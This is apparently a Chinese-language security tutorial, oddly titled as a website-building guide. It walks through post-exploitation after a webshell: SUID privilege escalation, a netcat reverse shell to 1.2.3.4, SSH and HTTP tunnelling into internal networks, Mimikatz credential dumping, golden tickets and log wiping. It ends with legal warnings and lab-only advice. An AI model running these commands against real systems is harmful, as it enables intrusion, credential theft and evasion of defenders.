企业官网建设流程全解析

💡导读：当你终于拿到了网站的 Webshell（上一期内容），故事其实才刚刚开始。企业的核心资产通常在内网：OA系统、财务数据库、域控制器（DC）。本期我们将模拟APT（高级持续性威胁）的攻击链，带你看看黑客在拿到服务器后，是如何一步步拿下整个公司的。

一、 什么是后渗透？

定义：在成功利用漏洞获取目标系统权限（Shell）之后，进行的一系列操作。

目标：

1. 权限提升：从普通用户www-data变成root或System。

2. 信息收集（内网）：我是谁？我在哪？周围还有谁？

3. 横向移动：利用当前机器作为跳板，攻击内网其他机器。

4. 权限维持：即使服务器重启，我还能连上来。

二、 实战演练：Linux 靶机提权（Privilege Escalation）

假设你通过文件上传拿到了一个 Webshell，但权限很低。

1. 信息收集（Recon）

在 Webshell 中执行：

whoami # 我是谁？ (www-data) uname -a # 内核版本是什么？ sudo -l # 我能用 sudo 执行什么命令？ find / -perm -4000 2>/dev/null # 查找带有 SUID 位的程序（提权常用）

2. 利用 SUID 提权（经典手法）

如果发现find命令有 SUID 权限：

# 在 Webshell 中执行 find /var/www -exec whoami \;

• 结果：如果返回root，说明可以利用find命令以 root 身份执行任意命令。

• Getshell：

  find /var/www -exec netcat -e /bin/sh 1.2.3.4 4444 \;

  攻击机监听 4444 端口，即可获得Root Shell。

三、 内网穿透：架设“隧道”

Web 服务器通常有两张网卡：一张对外，一张对内。你无法直接访问内网（192.168.x.x），需要通过隧道（Tunneling）技术。

1. SSH 隧道（正向/反向）

场景：目标内网有一台 MySQL（3306端口）只允许本地访问。

操作：

# 在跳板机上执行（将内网3306转发到你本地） ssh -N -f -L 3307:192.168.1.100:3306 user@web-server

现在你连接127.0.0.1:3307就等于连接了内网的 MySQL。

2. 使用 Neo-reGeorg / Frp

这是现代红队最常用的工具。通过在 Webshell 中上传一个tunnel.php，建立 HTTP 隧道，将内网流量代理出来。

四、 横向移动：拿下域控（Domain Controller）

这是后渗透的“圣杯”。

1. 窃取凭据（Credential Dumping）

• Linux：翻找配置文件config.php（数据库密码）、SSH 私钥id_rsa。

• Windows：使用 Mimikatz 抓取内存中的明文密码或 NTLM Hash。

  powershell

  sekurlsa::logonpasswords

2. 黄金票据（Golden Ticket）

如果你拿到了域控的krbtgt用户的 Hash，你可以伪造任意用户的票据（Ticket），直接访问域内所有资源，且无视密码修改。这是权限维持的最高境界。

五、 痕迹清理（Covering Tracks）

做完所有操作后，职业渗透师必须清理痕迹，防止被蓝队（防守方）溯源。

1. 清除历史命令：history -c。

2. 清除日志：echo > /var/log/auth.log。

3. 删除上传的工具：shred -zu nmap webshell.php。

⚠️ 安全警示与法律红线（后渗透篇）

🚨 最高级别的危险警告：

1. 严禁横向移动：在 SRC（漏洞众测）或普通授权测试中，严禁利用已拿到的服务器攻击内网其他机器。这通常超出了授权范围，属于违法行为。

2. 严禁权限维持：绝对禁止在企业系统中留后门、留公钥（SSH Key）或创建隐藏账户。一经发现，不仅会被取消测试资格，还可能面临法律诉讼。

3. 靶场环境：本篇提到的提权、内网穿透技术，仅限在 HTB (Hack The Box)、VulnHub 或自建的隔离虚拟机环境中练习。

后渗透是“核威慑”。你必须懂它，才能防御它；但绝不能乱用它，除非你想在监狱里度过余生。

💬 互动环节

• 在提权过程中，你遇到过最坑的情况是什么？（比如内核太新没有 EXP？）

• 你认为在内网渗透中，是技术重要，还是社工（密码复用）重要？

• 欢迎在评论区留言讨论！